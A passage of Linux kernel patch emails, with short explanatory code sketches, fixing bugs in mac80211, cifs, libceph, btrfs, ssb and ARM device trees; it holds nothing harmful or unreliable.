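The bookkeeping pattern used here, reduced to generic names (an illustration, not the mac80211 code): every change to the parent's counter is mirrored into all of its children, so the per-packet check on a child stays a cheap local read instead of a walk up to the parent.

#include <linux/list.h>

struct child {
	int needed_cnt;
	struct list_head list;
};

struct parent {
	int needed_cnt;
	struct list_head children;
};

/* Caller is assumed to hold whatever lock protects the children list. */
static void parent_adjust_cnt(struct parent *p, int delta)
{
	struct child *c;

	list_for_each_entry(c, &p->children, list)
		c->needed_cnt += delta;

	p->needed_cnt += delta;
}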
Signed-off-by: Michal Kazior Signed-off-by: Johannes Berg --- net/mac80211/iface.c | 6 ++++ net/mac80211/key.c | 82 +++++++++++++++++++++++++++++++++++++++----- net/mac80211/key.h | 1 + net/mac80211/util.c | 3 ++ 4 files changed, 83 insertions(+), 9 deletions(-) diff --git a/net/mac80211/iface.c b/net/mac80211/iface.c index bab5c63c0bad..84cef600c573 100644 --- a/net/mac80211/iface.c +++ b/net/mac80211/iface.c @@ -522,6 +522,12 @@ int ieee80211_do_open(struct wireless_dev *wdev, bool coming_up) memcpy(sdata->vif.hw_queue, master->vif.hw_queue, sizeof(sdata->vif.hw_queue)); sdata->vif.bss_conf.chandef = master->vif.bss_conf.chandef; + + mutex_lock(&local->key_mtx); + sdata->crypto_tx_tailroom_needed_cnt += + master->crypto_tx_tailroom_needed_cnt; + mutex_unlock(&local->key_mtx); + break; } case NL80211_IFTYPE_AP: diff --git a/net/mac80211/key.c b/net/mac80211/key.c index 2291cd730091..a907f2d5c12d 100644 --- a/net/mac80211/key.c +++ b/net/mac80211/key.c @@ -58,6 +58,22 @@ static void assert_key_lock(struct ieee80211_local *local) lockdep_assert_held(&local->key_mtx); } +static void +update_vlan_tailroom_need_count(struct ieee80211_sub_if_data *sdata, int delta) +{ + struct ieee80211_sub_if_data *vlan; + + if (sdata->vif.type != NL80211_IFTYPE_AP) + return; + + mutex_lock(&sdata->local->mtx); + + list_for_each_entry(vlan, &sdata->u.ap.vlans, u.vlan.list) + vlan->crypto_tx_tailroom_needed_cnt += delta; + + mutex_unlock(&sdata->local->mtx); +} + static void increment_tailroom_need_count(struct ieee80211_sub_if_data *sdata) { /* @@ -79,6 +95,8 @@ static void increment_tailroom_need_count(struct ieee80211_sub_if_data *sdata) * http://mid.gmane.org/1308590980.4322.19.camel@jlt3.sipsolutions.net */ + update_vlan_tailroom_need_count(sdata, 1); + if (!sdata->crypto_tx_tailroom_needed_cnt++) { /* * Flush all XMIT packets currently using HW encryption or no @@ -88,6 +106,15 @@ static void increment_tailroom_need_count(struct ieee80211_sub_if_data *sdata) } } +static void decrease_tailroom_need_count(struct ieee80211_sub_if_data *sdata, + int delta) +{ + WARN_ON_ONCE(sdata->crypto_tx_tailroom_needed_cnt < delta); + + update_vlan_tailroom_need_count(sdata, -delta); + sdata->crypto_tx_tailroom_needed_cnt -= delta; +} + static int ieee80211_key_enable_hw_accel(struct ieee80211_key *key) { struct ieee80211_sub_if_data *sdata; @@ -144,7 +171,7 @@ static int ieee80211_key_enable_hw_accel(struct ieee80211_key *key) if (!((key->conf.flags & IEEE80211_KEY_FLAG_GENERATE_MMIC) || (key->conf.flags & IEEE80211_KEY_FLAG_RESERVE_TAILROOM))) - sdata->crypto_tx_tailroom_needed_cnt--; + decrease_tailroom_need_count(sdata, 1); WARN_ON((key->conf.flags & IEEE80211_KEY_FLAG_PUT_IV_SPACE) && (key->conf.flags & IEEE80211_KEY_FLAG_GENERATE_IV)); @@ -541,7 +568,7 @@ static void __ieee80211_key_destroy(struct ieee80211_key *key, schedule_delayed_work(&sdata->dec_tailroom_needed_wk, HZ/2); } else { - sdata->crypto_tx_tailroom_needed_cnt--; + decrease_tailroom_need_count(sdata, 1); } } @@ -631,6 +658,7 @@ void ieee80211_key_free(struct ieee80211_key *key, bool delay_tailroom) void ieee80211_enable_keys(struct ieee80211_sub_if_data *sdata) { struct ieee80211_key *key; + struct ieee80211_sub_if_data *vlan; ASSERT_RTNL(); @@ -639,7 +667,14 @@ void ieee80211_enable_keys(struct ieee80211_sub_if_data *sdata) mutex_lock(&sdata->local->key_mtx); - sdata->crypto_tx_tailroom_needed_cnt = 0; + WARN_ON_ONCE(sdata->crypto_tx_tailroom_needed_cnt || + sdata->crypto_tx_tailroom_pending_dec); + + if (sdata->vif.type == NL80211_IFTYPE_AP) { + 
list_for_each_entry(vlan, &sdata->u.ap.vlans, u.vlan.list) + WARN_ON_ONCE(vlan->crypto_tx_tailroom_needed_cnt || + vlan->crypto_tx_tailroom_pending_dec); + } list_for_each_entry(key, &sdata->key_list, list) { increment_tailroom_need_count(sdata); @@ -649,6 +684,22 @@ void ieee80211_enable_keys(struct ieee80211_sub_if_data *sdata) mutex_unlock(&sdata->local->key_mtx); } +void ieee80211_reset_crypto_tx_tailroom(struct ieee80211_sub_if_data *sdata) +{ + struct ieee80211_sub_if_data *vlan; + + mutex_lock(&sdata->local->key_mtx); + + sdata->crypto_tx_tailroom_needed_cnt = 0; + + if (sdata->vif.type == NL80211_IFTYPE_AP) { + list_for_each_entry(vlan, &sdata->u.ap.vlans, u.vlan.list) + vlan->crypto_tx_tailroom_needed_cnt = 0; + } + + mutex_unlock(&sdata->local->key_mtx); +} + void ieee80211_iter_keys(struct ieee80211_hw *hw, struct ieee80211_vif *vif, void (*iter)(struct ieee80211_hw *hw, @@ -688,8 +739,8 @@ static void ieee80211_free_keys_iface(struct ieee80211_sub_if_data *sdata, { struct ieee80211_key *key, *tmp; - sdata->crypto_tx_tailroom_needed_cnt -= - sdata->crypto_tx_tailroom_pending_dec; + decrease_tailroom_need_count(sdata, + sdata->crypto_tx_tailroom_pending_dec); sdata->crypto_tx_tailroom_pending_dec = 0; ieee80211_debugfs_key_remove_mgmt_default(sdata); @@ -709,6 +760,7 @@ void ieee80211_free_keys(struct ieee80211_sub_if_data *sdata, { struct ieee80211_local *local = sdata->local; struct ieee80211_sub_if_data *vlan; + struct ieee80211_sub_if_data *master; struct ieee80211_key *key, *tmp; LIST_HEAD(keys); @@ -728,8 +780,20 @@ void ieee80211_free_keys(struct ieee80211_sub_if_data *sdata, list_for_each_entry_safe(key, tmp, &keys, list) __ieee80211_key_destroy(key, false); - WARN_ON_ONCE(sdata->crypto_tx_tailroom_needed_cnt || - sdata->crypto_tx_tailroom_pending_dec); + if (sdata->vif.type == NL80211_IFTYPE_AP_VLAN) { + if (sdata->bss) { + master = container_of(sdata->bss, + struct ieee80211_sub_if_data, + u.ap); + + WARN_ON_ONCE(sdata->crypto_tx_tailroom_needed_cnt != + master->crypto_tx_tailroom_needed_cnt); + } + } else { + WARN_ON_ONCE(sdata->crypto_tx_tailroom_needed_cnt || + sdata->crypto_tx_tailroom_pending_dec); + } + if (sdata->vif.type == NL80211_IFTYPE_AP) { list_for_each_entry(vlan, &sdata->u.ap.vlans, u.vlan.list) WARN_ON_ONCE(vlan->crypto_tx_tailroom_needed_cnt || @@ -793,8 +857,8 @@ void ieee80211_delayed_tailroom_dec(struct work_struct *wk) */ mutex_lock(&sdata->local->key_mtx); - sdata->crypto_tx_tailroom_needed_cnt -= - sdata->crypto_tx_tailroom_pending_dec; + decrease_tailroom_need_count(sdata, + sdata->crypto_tx_tailroom_pending_dec); sdata->crypto_tx_tailroom_pending_dec = 0; mutex_unlock(&sdata->local->key_mtx); } diff --git a/net/mac80211/key.h b/net/mac80211/key.h index c5a31835be0e..96557dd1e77d 100644 --- a/net/mac80211/key.h +++ b/net/mac80211/key.h @@ -161,6 +161,7 @@ void ieee80211_free_keys(struct ieee80211_sub_if_data *sdata, void ieee80211_free_sta_keys(struct ieee80211_local *local, struct sta_info *sta); void ieee80211_enable_keys(struct ieee80211_sub_if_data *sdata); +void ieee80211_reset_crypto_tx_tailroom(struct ieee80211_sub_if_data *sdata); #define key_mtx_dereference(local, ref) \ rcu_dereference_protected(ref, lockdep_is_held(&((local)->key_mtx))) diff --git a/net/mac80211/util.c b/net/mac80211/util.c index 79412f16b61d..b864ebc6ab8f 100644 --- a/net/mac80211/util.c +++ b/net/mac80211/util.c @@ -2022,6 +2022,9 @@ int ieee80211_reconfig(struct ieee80211_local *local) mutex_unlock(&local->sta_mtx); /* add back keys */ + list_for_each_entry(sdata, 
&local->interfaces, list) + ieee80211_reset_crypto_tx_tailroom(sdata); + list_for_each_entry(sdata, &local->interfaces, list) if (ieee80211_sdata_running(sdata)) ieee80211_enable_keys(sdata); From c5a71688e1e56e155fb79b8d699322f4f0793cc8 Mon Sep 17 00:00:00 2001 From: Arik Nemtsov Date: Tue, 19 May 2015 14:36:48 +0300 Subject: [PATCH 130/872] mac80211: disconnect TDLS stations on STA CSA When a station does a channel switch, it's not well defined what its TDLS peers would do. Avoid a situation when the local side marks a potentially disconnected peer as a TDLS peer. Keeping peers connected through CSA is doubly problematic with the upcoming TDLS WIDER-BW feature which allows peers to widen the BSS channel. The new channel transitioned-to might not be compatible and would require a re-negotiation anyway. Make sure to disallow new TDLS link during CSA. Signed-off-by: Arik Nemtsov Signed-off-by: Emmanuel Grumbach Signed-off-by: Johannes Berg --- net/mac80211/mlme.c | 26 ++++++++++++++++++++++++++ net/mac80211/tdls.c | 6 ++++++ 2 files changed, 32 insertions(+) diff --git a/net/mac80211/mlme.c b/net/mac80211/mlme.c index 3294666f599c..387fe70ab126 100644 --- a/net/mac80211/mlme.c +++ b/net/mac80211/mlme.c @@ -1098,6 +1098,24 @@ static void ieee80211_chswitch_timer(unsigned long data) ieee80211_queue_work(&sdata->local->hw, &sdata->u.mgd.chswitch_work); } +static void ieee80211_teardown_tdls_peers(struct ieee80211_sub_if_data *sdata) +{ + struct sta_info *sta; + u16 reason = WLAN_REASON_TDLS_TEARDOWN_UNSPECIFIED; + + rcu_read_lock(); + list_for_each_entry_rcu(sta, &sdata->local->sta_list, list) { + if (!sta->sta.tdls || sta->sdata != sdata || !sta->uploaded || + !test_sta_flag(sta, WLAN_STA_AUTHORIZED)) + continue; + + ieee80211_tdls_oper_request(&sdata->vif, sta->sta.addr, + NL80211_TDLS_TEARDOWN, reason, + GFP_ATOMIC); + } + rcu_read_unlock(); +} + static void ieee80211_sta_process_chanswitch(struct ieee80211_sub_if_data *sdata, u64 timestamp, u32 device_timestamp, @@ -1161,6 +1179,14 @@ ieee80211_sta_process_chanswitch(struct ieee80211_sub_if_data *sdata, return; } + /* + * Drop all TDLS peers - either we disconnect or move to a different + * channel from this point on. There's no telling what our peer will do. + * The TDLS WIDER_BW scenario is also problematic, as peers might now + * have an incompatible wider chandef. + */ + ieee80211_teardown_tdls_peers(sdata); + mutex_lock(&local->mtx); mutex_lock(&local->chanctx_mtx); conf = rcu_dereference_protected(sdata->vif.chanctx_conf, diff --git a/net/mac80211/tdls.c b/net/mac80211/tdls.c index 8a92a920ff17..75e8e3bba538 100644 --- a/net/mac80211/tdls.c +++ b/net/mac80211/tdls.c @@ -1183,6 +1183,12 @@ int ieee80211_tdls_oper(struct wiphy *wiphy, struct net_device *dev, switch (oper) { case NL80211_TDLS_ENABLE_LINK: + if (sdata->vif.csa_active) { + tdls_dbg(sdata, "TDLS: disallow link during CSA\n"); + ret = -EBUSY; + break; + } + rcu_read_lock(); sta = sta_info_get(sdata, peer); if (!sta) { From c411ead995b46f361b92116fd042ae83866044a1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Rafa=C5=82=20Mi=C5=82ecki?= Date: Wed, 13 May 2015 07:36:38 +0200 Subject: [PATCH 131/872] ssb: extend fix for PCI related silent reboots to all chipsets MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Recent fix for BCM4704 reboots has to be extended as the same problem affects Linksys WRT350N v1 (BCM4705). 
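A side note on the primitive used (editorial, with a hypothetical helper name): usleep_range() sleeps on an hrtimer rather than busy-waiting like udelay(), and the min/max window lets the timer code coalesce wakeups, which is why it fits a 1-2 ms post-reset settling delay:

#include <linux/delay.h>

/* Give just-reset PCI devices time to settle before config accesses. */
static void foo_post_reset_settle(void)
{
	usleep_range(1000, 2000);	/* microseconds */
}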
Signed-off-by: Rafał Miłecki Reported-by: Daniel Gimpelevich Signed-off-by: Kalle Valo --- drivers/ssb/driver_pcicore.c | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/drivers/ssb/driver_pcicore.c b/drivers/ssb/driver_pcicore.c index 15a7ee3859dd..5fe1c22e289b 100644 --- a/drivers/ssb/driver_pcicore.c +++ b/drivers/ssb/driver_pcicore.c @@ -359,12 +359,13 @@ static void ssb_pcicore_init_hostmode(struct ssb_pcicore *pc) /* * Accessing PCI config without a proper delay after devices reset (not - * GPIO reset) was causing reboots on WRT300N v1.0. + * GPIO reset) was causing reboots on WRT300N v1.0 (BCM4704). * Tested delay 850 us lowered reboot chance to 50-80%, 1000 us fixed it * completely. Flushing all writes was also tested but with no luck. + * The same problem was reported for WRT350N v1 (BCM4705), so we just + * sleep here unconditionally. */ - if (pc->dev->bus->chip_id == 0x4704) - usleep_range(1000, 2000); + usleep_range(1000, 2000); /* Enable PCI bridge BAR0 prefetch and burst */ val = PCI_COMMAND_MASTER | PCI_COMMAND_MEMORY; From 1dc92c450a53f120b67296cb4b29c1dfdc665ac1 Mon Sep 17 00:00:00 2001 From: Steve French Date: Wed, 20 May 2015 09:32:21 -0500 Subject: [PATCH 132/872] [cifs] fix null pointer check Dan Carpenter pointed out an inconsistent null pointer check in smb2_hdr_assemble that was flagged by a static checker. Signed-off-by: Steve French Reviewed-by: Sachin Prabhu CC: Dan Carpenter --- fs/cifs/smb2pdu.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c index 65cd7a84c8bc..54cbe19d9c08 100644 --- a/fs/cifs/smb2pdu.c +++ b/fs/cifs/smb2pdu.c @@ -110,7 +110,7 @@ smb2_hdr_assemble(struct smb2_hdr *hdr, __le16 smb2_cmd /* command */ , /* GLOBAL_CAP_LARGE_MTU will only be set if dialect > SMB2.02 */ /* See sections 2.2.4 and 3.2.4.1.5 of MS-SMB2 */ - if ((tcon->ses) && + if ((tcon->ses) && (tcon->ses->server) && (tcon->ses->server->capabilities & SMB2_GLOBAL_CAP_LARGE_MTU)) hdr->CreditCharge = cpu_to_le16(1); /* else CreditCharge MBZ */ From 65c3b205ebe06a389a29544e71a8071da0ce4155 Mon Sep 17 00:00:00 2001 From: Dan Carpenter Date: Thu, 30 Apr 2015 17:30:24 +0300 Subject: [PATCH 133/872] CIFS: remove an unneeded NULL check Smatch complains because we dereference "ses->server" without checking some lines earlier inside the call to get_next_mid(ses->server). fs/cifs/cifssmb.c:4921 CIFSGetDFSRefer() warn: variable dereferenced before check 'ses->server' (see line 4899) There is only one caller of this function, get_dfs_path(), and it always passes a non-null "ses->server" pointer, so this NULL check can be removed.
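As a minimal illustration of the warning class Smatch raises here, the sketch below uses hypothetical types and names (struct session, struct server, session_flags) rather than the cifs code; it only shows the generic "dereference first, NULL-check afterwards" shape, where either the later check is dead code or the first use is the real bug.

struct server { int capabilities; int sign; };
struct session { struct server *server; };

static int session_flags(struct session *ses)
{
	int caps = ses->server->capabilities;	/* dereferenced here ... */

	if (ses->server && ses->server->sign)	/* ... NULL-checked only afterwards */
		caps |= 1;

	return caps;
}

In the cifs case the first interpretation applies: the only caller guarantees a non-NULL pointer, so the redundant check is the part that goes away.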
Signed-off-by: Dan Carpenter Signed-off-by: Steve French --- fs/cifs/cifssmb.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/fs/cifs/cifssmb.c b/fs/cifs/cifssmb.c index 1091affba425..f26ffbfc64d8 100644 --- a/fs/cifs/cifssmb.c +++ b/fs/cifs/cifssmb.c @@ -4918,7 +4918,7 @@ CIFSGetDFSRefer(const unsigned int xid, struct cifs_ses *ses, strncpy(pSMB->RequestFileName, search_name, name_len); } - if (ses->server && ses->server->sign) + if (ses->server->sign) pSMB->hdr.Flags2 |= SMBFLG2_SECURITY_SIGNATURE; pSMB->hdr.Uid = ses->Suid; From 3d76be5b933e2a66d85a2f7444e68e99e8a48ad4 Mon Sep 17 00:00:00 2001 From: Robert Nelson Date: Wed, 20 May 2015 10:00:10 -0700 Subject: [PATCH 134/872] ARM: dts: am335x-boneblack: disable RTC-only sleep Fixes: http://bugs.elinux.org/issues/143 Entering RTC-only sleep is only properly supported on the early prototype series (pre-A6) of the BeagleBone Black. Since rev A6A, which includes all production versions, it is no longer supported, due to: (rev A6) enable of the 3v3b regulator moved from LDO2 to LDO4 (3v3a) side-effect: 3v3b rail remains on in sleep-mode (also in off-mode when battery-powered) (rev A6A) am335x vdds supply moved from LDO3 to LDO1 side-effect: vdds remains supplied in sleep-mode Reported-by: Matthijs van Duin Tested-by: Matthijs van Duin Signed-off-by: Robert Nelson Cc: Tony Lindgren Cc: Felipe Balbi Cc: Johan Hovold Signed-off-by: Tony Lindgren --- arch/arm/boot/dts/am335x-boneblack.dts | 4 ---- 1 file changed, 4 deletions(-) diff --git a/arch/arm/boot/dts/am335x-boneblack.dts b/arch/arm/boot/dts/am335x-boneblack.dts index 5c42d259fa68..901739fcb85a 100644 --- a/arch/arm/boot/dts/am335x-boneblack.dts +++ b/arch/arm/boot/dts/am335x-boneblack.dts @@ -80,7 +80,3 @@ status = "okay"; }; }; - -&rtc { - system-power-controller; -}; From ed38c6573b2ef34b3629989f7b6ac5894a010403 Mon Sep 17 00:00:00 2001 From: Anthoine Bourgeois Date: Wed, 20 May 2015 10:00:10 -0700 Subject: [PATCH 135/872] ARM: dts: omap3-devkit8000: Fix NAND DT node Add nand-ecc-opt and device-width properties to enable nand support on Devkit8000. Signed-off-by: Anthoine Bourgeois Signed-off-by: Tony Lindgren --- arch/arm/boot/dts/omap3-devkit8000.dts | 2 ++ 1 file changed, 2 insertions(+) diff --git a/arch/arm/boot/dts/omap3-devkit8000.dts b/arch/arm/boot/dts/omap3-devkit8000.dts index 134d3f27a8ec..921de6605f07 100644 --- a/arch/arm/boot/dts/omap3-devkit8000.dts +++ b/arch/arm/boot/dts/omap3-devkit8000.dts @@ -110,6 +110,8 @@ nand@0,0 { reg = <0 0 4>; /* CS0, offset 0, IO size 4 */ nand-bus-width = <16>; + gpmc,device-width = <2>; + ti,nand-ecc-opt = "sw"; gpmc,sync-clk-ps = <0>; gpmc,cs-on-ns = <0>; From f25bf74c8862efdc30453d16d60cf22958a4873e Mon Sep 17 00:00:00 2001 From: Romain Izard Date: Wed, 20 May 2015 10:00:10 -0700 Subject: [PATCH 136/872] ARM: dts: Fix WLAN interrupt line for AM335x EVM-SK While Sitara AM335x SoCs are very close to OMAP SoCs, the 32-line GPIO controllers are numbered from 0 on AM335x and from 1 on OMAP. But when the configuration for the TI WLAN controllers was converted from platform data to device tree, this detail was overlooked, as 10 boards were using OMAP with the WL12xx and WL18xx controllers, and only one was based on AM335x. This invalid configuration prevents the WL1271 module on the AM335x EVM-SK from notifying interrupts to the SoC, and breaks the wlan driver. The DTS must be corrected to use the correct GPIO controller.
Signed-off-by: Romain Izard Signed-off-by: Tony Lindgren --- arch/arm/boot/dts/am335x-evmsk.dts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/arm/boot/dts/am335x-evmsk.dts b/arch/arm/boot/dts/am335x-evmsk.dts index 87fc7a35e802..156d05efcb70 100644 --- a/arch/arm/boot/dts/am335x-evmsk.dts +++ b/arch/arm/boot/dts/am335x-evmsk.dts @@ -654,7 +654,7 @@ wlcore: wlcore@2 { compatible = "ti,wl1271"; reg = <2>; - interrupt-parent = <&gpio1>; + interrupt-parent = <&gpio0>; interrupts = <31 IRQ_TYPE_LEVEL_HIGH>; /* gpio 31 */ ref-clock-frequency = <38400000>; }; From b0494532214bdfbf241e94fabab5dd46f7b82631 Mon Sep 17 00:00:00 2001 From: Ilya Dryomov Date: Mon, 11 May 2015 17:53:10 +0300 Subject: [PATCH 137/872] libceph: request a new osdmap if lingering request maps to no osd This commit does two things. First, if there are any homeless lingering requests, we now request a new osdmap even if the osdmap that is being processed brought no changes, i.e. if a given lingering request turned homeless in one of the previous epochs and remained homeless in the current epoch. Not doing so leaves us with a stale osdmap and as a result we may miss our window for reestablishing the watch and lose notifies. MON=1 OSD=1: # cat linger-needmap.sh #!/bin/bash rbd create --size 1 test DEV=$(rbd map test) ceph osd out 0 rbd map dne/dne # obtain a new osdmap as a side effect (!) sleep 1 ceph osd in 0 rbd resize --size 2 test # rbd info test | grep size -> 2M # blockdev --getsize $DEV -> 1M N.B.: Not obtaining a new osdmap in between "osd out" and "osd in" above is enough to make it miss that resize notify, but that is a bug^Wlimitation of ceph watch/notify v1. Second, homeless lingering requests are now kicked just like those lingering requests whose mapping has changed. This is mainly to recognize that a homeless lingering request makes no sense and to preserve the invariant that a registered lingering request is not sitting on any of r_req_lru_item lists. This spares us a WARN_ON, which commit ba9d114ec557 ("libceph: clear r_req_lru_item in __unregister_linger_request()") tried to fix the _wrong_ way. Cc: stable@vger.kernel.org # 3.10+ Signed-off-by: Ilya Dryomov Reviewed-by: Sage Weil --- net/ceph/osd_client.c | 31 ++++++++++++++++++++----------- 1 file changed, 20 insertions(+), 11 deletions(-) diff --git a/net/ceph/osd_client.c b/net/ceph/osd_client.c index 41a4abc7e98e..31d4b1ebff01 100644 --- a/net/ceph/osd_client.c +++ b/net/ceph/osd_client.c @@ -2017,20 +2017,29 @@ static void kick_requests(struct ceph_osd_client *osdc, bool force_resend, err = __map_request(osdc, req, force_resend || force_resend_writes); dout("__map_request returned %d\n", err); - if (err == 0) - continue; /* no change and no osd was specified */ if (err < 0) continue; /* hrm! */ - if (req->r_osd == NULL) { - dout("tid %llu maps to no valid osd\n", req->r_tid); - needmap++; /* request a newer map */ - continue; - } + if (req->r_osd == NULL || err > 0) { + if (req->r_osd == NULL) { + dout("lingering %p tid %llu maps to no osd\n", + req, req->r_tid); + /* + * A homeless lingering request makes + * no sense, as it's job is to keep + * a particular OSD connection open. + * Request a newer map and kick the + * request, knowing that it won't be + * resent until we actually get a map + * that can tell us where to send it. + */ + needmap++; + } - dout("kicking lingering %p tid %llu osd%d\n", req, req->r_tid, - req->r_osd ? 
req->r_osd->o_osd : -1); - __register_request(osdc, req); - __unregister_linger_request(osdc, req); + dout("kicking lingering %p tid %llu osd%d\n", req, + req->r_tid, req->r_osd ? req->r_osd->o_osd : -1); + __register_request(osdc, req); + __unregister_linger_request(osdc, req); + } } reset_changed_osds(osdc); mutex_unlock(&osdc->request_mutex); From 521a04d06a729e5971cdee7f84080387ed320527 Mon Sep 17 00:00:00 2001 From: Ilya Dryomov Date: Mon, 11 May 2015 17:53:34 +0300 Subject: [PATCH 138/872] Revert "libceph: clear r_req_lru_item in __unregister_linger_request()" This reverts commit ba9d114ec5578e6e99a4dfa37ff8ae688040fd64. .. which introduced a regression that prevented all lingering requests requeued in kick_requests() from ever being sent to the OSDs, resulting in a lot of missed notifies. In retrospect it's pretty obvious that r_req_lru_item item in the case of lingering requests can be used not only for notarget, but also for unsent linkage due to how tightly actual map and enqueue operations are coupled in __map_request(). The assertion that was being silenced is taken care of in the previous ("libceph: request a new osdmap if lingering request maps to no osd") commit: by always kicking homeless lingering requests we ensure that none of them ends up on the notarget list outside of the critical section guarded by request_mutex. Cc: stable@vger.kernel.org # 3.18+, needs b0494532214b "libceph: request a new osdmap if lingering request maps to no osd" Signed-off-by: Ilya Dryomov Reviewed-by: Sage Weil --- net/ceph/osd_client.c | 2 -- 1 file changed, 2 deletions(-) diff --git a/net/ceph/osd_client.c b/net/ceph/osd_client.c index 31d4b1ebff01..c4ec9239249a 100644 --- a/net/ceph/osd_client.c +++ b/net/ceph/osd_client.c @@ -1306,8 +1306,6 @@ static void __unregister_linger_request(struct ceph_osd_client *osdc, if (list_empty(&req->r_osd_item)) req->r_osd = NULL; } - - list_del_init(&req->r_req_lru_item); /* can be on notarget */ ceph_osdc_put_request(req); } From 153c35b6cccc0c72de9fae06c8e2c8b2c47d79d4 Mon Sep 17 00:00:00 2001 From: Chris Mason Date: Tue, 19 May 2015 18:54:41 -0700 Subject: [PATCH 139/872] Btrfs: fix regression in raid level conversion Commit 2f0810880f082fa8ba66ab2c33b02e4ff9770a5e changed btrfs_set_block_group_ro to avoid trying to allocate new chunks with the new raid profile during conversion. This fixed failures when there was no space on the drive to allocate a new chunk, but the metadata reserves were sufficient to continue the conversion. But this ended up causing a regression when the drive had plenty of space to allocate new chunks, mostly because reduce_alloc_profile isn't using the new raid profile. Fixing btrfs_reduce_alloc_profile is a bigger patch. For now, do a partial revert of 2f0810880, and don't error out if we hit ENOSPC. Signed-off-by: Chris Mason Tested-by: Dave Sterba Reported-by: Holger Hoffstaette --- fs/btrfs/extent-tree.c | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/fs/btrfs/extent-tree.c b/fs/btrfs/extent-tree.c index 45e3f086790b..0ec3acd14cbf 100644 --- a/fs/btrfs/extent-tree.c +++ b/fs/btrfs/extent-tree.c @@ -8829,6 +8829,24 @@ int btrfs_set_block_group_ro(struct btrfs_root *root, goto again; } + /* + * if we are changing raid levels, try to allocate a corresponding + * block group with the new raid level. 
+ */ + alloc_flags = update_block_group_flags(root, cache->flags); + if (alloc_flags != cache->flags) { + ret = do_chunk_alloc(trans, root, alloc_flags, + CHUNK_ALLOC_FORCE); + /* + * ENOSPC is allowed here, we may have enough space + * already allocated at the new raid level to + * carry on + */ + if (ret == -ENOSPC) + ret = 0; + if (ret < 0) + goto out; + } ret = set_block_group_ro(cache, 0); if (!ret) From 7196ac113a4f38b7ca1a3282fd9edf328bd22287 Mon Sep 17 00:00:00 2001 From: Nakajima Akira Date: Wed, 22 Apr 2015 15:24:44 +0900 Subject: [PATCH 140/872] Fix to check Unique id and FileType when client refer file directly. When you refer file directly on cifs client, (e.g. ls -li , cd , stat ) the function return old inode number and filetype from old inode cache, though server has different inode number or filetype. When server is Windows, cifs client has same problem. When Server is Windows , This patch fixes bug in different filetype, but does not fix bug in different inode number. Because QUERY_PATH_INFO response by Windows does not include inode number(Index Number) . BUG INFO https://bugzilla.kernel.org/show_bug.cgi?id=90021 https://bugzilla.kernel.org/show_bug.cgi?id=90031 Reported-by: Nakajima Akira Signed-off-by: Nakajima Akira Reviewed-by: Shirish Pargaonkar Signed-off-by: Steve French --- fs/cifs/inode.c | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) diff --git a/fs/cifs/inode.c b/fs/cifs/inode.c index ef71aa1515f6..f621b44cb800 100644 --- a/fs/cifs/inode.c +++ b/fs/cifs/inode.c @@ -401,9 +401,25 @@ int cifs_get_inode_info_unix(struct inode **pinode, rc = -ENOMEM; } else { /* we already have inode, update it */ + + /* if uniqueid is different, return error */ + if (unlikely(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM && + CIFS_I(*pinode)->uniqueid != fattr.cf_uniqueid)) { + rc = -ESTALE; + goto cgiiu_exit; + } + + /* if filetype is different, return error */ + if (unlikely(((*pinode)->i_mode & S_IFMT) != + (fattr.cf_mode & S_IFMT))) { + rc = -ESTALE; + goto cgiiu_exit; + } + cifs_fattr_to_inode(*pinode, &fattr); } +cgiiu_exit: return rc; } @@ -838,6 +854,15 @@ cifs_get_inode_info(struct inode **inode, const char *full_path, if (!*inode) rc = -ENOMEM; } else { + /* we already have inode, update it */ + + /* if filetype is different, return error */ + if (unlikely(((*inode)->i_mode & S_IFMT) != + (fattr.cf_mode & S_IFMT))) { + rc = -ESTALE; + goto cgii_exit; + } + cifs_fattr_to_inode(*inode, &fattr); } From 00b8c95b680791a72b4bb14dc371ff1f1daae39c Mon Sep 17 00:00:00 2001 From: Chengyu Song Date: Tue, 24 Mar 2015 20:18:49 -0400 Subject: [PATCH 141/872] cifs: potential missing check for posix_lock_file_wait posix_lock_file_wait may fail under certain circumstances, and its result is usually checked/returned. But given the complexity of cifs, I'm not sure if the result is intentially left unchecked and always expected to succeed. 
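A condensed sketch of the error-propagation rule the change adopts is shown below; finish_unlock and the rc parameter (standing in for the result of the preceding protocol-level unlock) are hypothetical, while posix_lock_file_wait(), FL_POSIX, struct file and struct file_lock are the stock VFS API the patch itself uses.

#include <linux/fs.h>

/* rc carries the result of the protocol-level unlock performed just before */
static int finish_unlock(struct file *file, struct file_lock *flock, int rc)
{
	/* Call into the VFS only when nothing failed earlier, and when the
	 * call is made, do not drop its return value.
	 */
	if ((flock->fl_flags & FL_POSIX) && !rc)
		rc = posix_lock_file_wait(file, flock);

	return rc;
}

This keeps the first failure as the value reported to the caller while still surfacing a late posix_lock_file_wait() error when everything before it succeeded.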
Signed-off-by: Chengyu Song Acked-by: Jeff Layton Signed-off-by: Steve French --- fs/cifs/file.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/fs/cifs/file.c b/fs/cifs/file.c index 5cfa7129d876..3f50cee79df9 100644 --- a/fs/cifs/file.c +++ b/fs/cifs/file.c @@ -1552,8 +1552,8 @@ cifs_setlk(struct file *file, struct file_lock *flock, __u32 type, rc = server->ops->mand_unlock_range(cfile, flock, xid); out: - if (flock->fl_flags & FL_POSIX) - posix_lock_file_wait(file, flock); + if (flock->fl_flags & FL_POSIX && !rc) + rc = posix_lock_file_wait(file, flock); return rc; } From b29103076bec8316e155e71309dc0fba499022c6 Mon Sep 17 00:00:00 2001 From: Nakajima Akira Date: Thu, 9 Apr 2015 17:27:39 +0900 Subject: [PATCH 142/872] Fix to convert SURROGATE PAIR Garbled characters happen by using surrogate pair for filename. (replace each 1 character to ??) [Steps to Reproduce for bug] client# touch $(echo -e '\xf0\x9d\x9f\xa3') client# touch $(echo -e '\xf0\x9d\x9f\xa4') client# ls -li You see same inode number, same filename(=?? and ??) . Fix the bug about these functions do not consider 